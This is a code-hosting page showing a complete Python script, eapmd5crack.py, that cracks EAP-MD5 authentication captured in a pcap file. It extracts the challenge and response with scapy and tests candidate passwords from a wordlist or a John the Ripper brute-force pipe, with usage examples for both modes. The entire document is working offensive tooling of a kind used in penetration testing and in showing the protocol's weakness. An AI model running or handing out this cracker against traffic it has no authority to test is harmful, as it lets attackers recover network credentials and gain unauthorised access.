/
eapmd5crack.py
executable file
·76 lines (65 loc) · 2.44 KB
/
eapmd5crack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
#!/usr/bin/python -tt
# eapmd5crack.py will crack a eap-md5 challenge response captured on the network
# By Mark Baggett & Tim Tomes (LaNMaSteR53) available for download at www.LaNMaSteR53.com
import md5, sys, time, logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
def md5sum(value):
hasher = md5.new()
hasher.update(value)
return hasher.digest()
reqhash = {}
resphash = {}
if len(sys.argv) < 3:
print """Syntax: python eapmd5crack.py /path/to/pcapfile.pcap /path/to/password.txt [-v]
Example:
Dictionary Attack -
$ python eapmd5crack.py ./eapmd5_exchange.pcap ./dict.txt -v
Brute Force Attack -
$ mknod pwque p
$ /pentest/passwords/jtr/john -i:All --stdout >> pwque &
$ python eapmd5crack.py ./eapmd5exchange.pcap ./pwque
"""
sys.exit(2)
pcapfile = sys.argv[1]
passfile = sys.argv[2]
verbose = False
if len(sys.argv) > 3:
if sys.argv[3] == '-v':
verbose = True
print "[-] Reading capture..."
pwfile=open(passfile,"r")
p=rdpcap(pcapfile)
wordcount = 0
eapExist = False
print "[-] Searching for EAP-MD5 authentication exchange..."
for packets in p:
if packets.haslayer(EAP):
if packets[EAP].type==4:
reqid=packets[EAP].id
if packets[EAP].code == 1:
reqhash[reqid]=packets[EAP].load[1:17]
eapExist = True
print "[-] EAP authentication exchange found."
print "[-] Message ID: " + str(reqid)
print "[-] Challenge: " + reqhash[reqid].encode("hex")
if packets[EAP].code == 2:
resphash[reqid]=packets[EAP].load[1:17]
print "[-] Needed Response: " + resphash[reqid].encode("hex")
if raw_input("Would you like to crack this exchange? [Y/n]: ").upper() == "Y":
cracked = False
start = time.time()
for line in pwfile:
wordcount += 1
currentpw = line.strip()
if verbose: print "[+] Attempting password... " + currentpw
if md5sum(chr(reqid) + currentpw + reqhash[reqid]) == resphash[reqid]:
print "[-] Password found: " + currentpw
cracked = True
break
stop = time.time()
if cracked == False: print "[-] Password not found."
time = stop - start
print "\nAttempted %d passwords in %.2f seconds. [%d p/s]" % (wordcount, time, round(wordcount/time, 2))
sys.exit(2)
if eapExist == False: print "[-] EAP authentication exchange not found. Quitting..."